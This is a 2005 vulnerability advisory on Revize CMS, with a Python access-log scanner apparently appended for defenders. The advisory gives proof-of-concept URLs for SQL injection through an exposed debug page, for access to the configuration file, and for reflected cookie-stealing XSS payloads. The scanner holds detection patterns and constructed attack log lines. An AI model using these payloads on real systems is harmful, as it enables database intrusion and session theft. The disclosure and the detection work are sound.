#######################################################
Revize(r) CMS SQL information disclosure and XSS
Vendor url: http://www.idetix.com
Advisory: http://lostmon.blogspot.com/2005/11/revizer-cms-sql-information-disclosure.html
Vendor notify:
exploit available: yes
#######################################################

The Revize(r) Web Content Management System enables non-technical content contributors to quickly and easily keep their Web pages up-to-date. Revize can be applied to a sophisticated, mature site or to the development of a new Web site from the ground up. Revize is powerful enough to manage Web content for any large organization, or it can be localized to one or more departments.

The input passed to the "query" parameter in "query_results.jsp" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code, which may allow a remote attacker to execute or manipulate SQL queries in the backend database.

A remote user can also obtain sensitive data about the target system by requesting 'revize.xml', located in the 'conf' directory, directly. The normal URL for this flaw is:

http://[victim]/revize/conf/

#################
version
#################

Unknown version of Revize(r) CMS

##################
solution
##################

No solution at this time.

###################
Timeline
###################

Discovered: 02-11-2005
vendor notify: 14-11-2005
vendor response:
disclosure: 16-11-2005

#######################
examples
#######################

SQL command:

http://[Victim]/revize/debug/query_results.jsp?webspace=REVIZE&query=select%20*%20from%20pbpublic.rSubjects

http://[Victim]/revize/debug/query_results.jsp?query=select%20*%20from%20pbpublic.rSubjects

http://[Victim]/revize/debug/query_input.jsp?table=rSubjects&apptable&webspace=REVIZE

Admin bypass?

http://[Victim]/revize/debug/

When we are at this URL, the page shows a login form for access, but if we click any link we can obtain some relevant information about the site without needing a login.

http://[Victim]/revize/debug/apptables.html

http://[Victim]/revize/debug/main.html

#####################
cross site scripting
#####################

http://[victim]/revize/HTTPTranslatorServlet?redirect=/revize/admincenter/setWebSpace.jsp&action=login&resourcetype=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Esecurity&objectmap=subject&error=admincenter/login.jsp

http://[victim]/revize/HTTPTranslatorServlet?redirect=/revize/admincenter/setWebSpace.jsp&action=login&resourcetype=security&objectmap=subject%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&error=admincenter/login.jsp

http://[victim]/revize/HTTPTranslatorServlet?redirect=/revize/admincenter/setWebSpace.jsp%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&action=login&resourcetype=security&objectmap=subject&error=admincenter/login.jsp

###################
End
############################

thnx to estrella for being my light

Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/

--
Curiosity is what moves the mind....
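A defender-side check for the request patterns this advisory describes, added here as an example and not part of the original advisory: it scans web-server access-log lines for requests to the /revize/debug/ console (and SQL keywords in its "query" parameter), requests under /revize/conf/, and script markup in the HTTPTranslatorServlet parameters named above. The log lines, IPs and timestamps in SAMPLE_LOG are constructed for this example, and the regex and function names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not from the advisory); only the paths
# and parameter names are the ones the advisory describes.
SAMPLE_LOG = """\
10.0.0.5 - - [16/Nov/2005:10:01:02 +0100] "GET /revize/debug/query_results.jsp?webspace=REVIZE&query=select%20*%20from%20pbpublic.rSubjects HTTP/1.1" 200 5120
10.0.0.5 - - [16/Nov/2005:10:01:09 +0100] "GET /revize/conf/revize.xml HTTP/1.1" 200 2210
10.0.0.7 - - [16/Nov/2005:10:02:30 +0100] "GET /revize/HTTPTranslatorServlet?redirect=/revize/admincenter/setWebSpace.jsp&action=login&resourcetype=%22%3E%3Cscript%3Ealert(1)%3C/script%3E&objectmap=subject HTTP/1.1" 200 1800
10.0.0.9 - - [16/Nov/2005:10:03:00 +0100] "GET /revize/index.jsp HTTP/1.1" 200 900
"""

# Common Log Format request line: client IP, timestamp, method, URL, status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})')
SQL_RE = re.compile(r"\b(select|insert|update|delete|union|drop)\b", re.I)
XSS_RE = re.compile(r"<\s*script|javascript:|onerror\s*=", re.I)

def classify(url):
    """Return the findings for one request URL, one per issue in the advisory."""
    parts = urlsplit(url)
    path = parts.path
    params = parse_qs(parts.query, keep_blank_values=True)  # values are URL-decoded here
    findings = []
    if path.startswith("/revize/debug/"):
        findings.append("debug-console-access")
        if any(SQL_RE.search(v) for v in params.get("query", [])):
            findings.append("sql-injection-attempt")
    if path.startswith("/revize/conf/"):
        findings.append("config-file-disclosure")
    if path.endswith("/HTTPTranslatorServlet"):
        for name in ("redirect", "resourcetype", "objectmap", "error"):
            if any(XSS_RE.search(v) for v in params.get(name, [])):
                findings.append(f"reflected-xss-attempt:{name}")
    return findings

def scan_log(text):
    """Return (ip, status, findings) for every log line with at least one finding."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        findings = classify(m.group("url"))
        if findings:
            hits.append((m.group("ip"), int(m.group("status")), findings))
    return hits

if __name__ == "__main__":
    for ip, status, findings in scan_log(SAMPLE_LOG):
        print(ip, status, ", ".join(findings))
```

A 200 status on a flagged /revize/debug/ or /revize/conf/ request is the signal that the debug console or configuration file is actually reachable, not merely being probed.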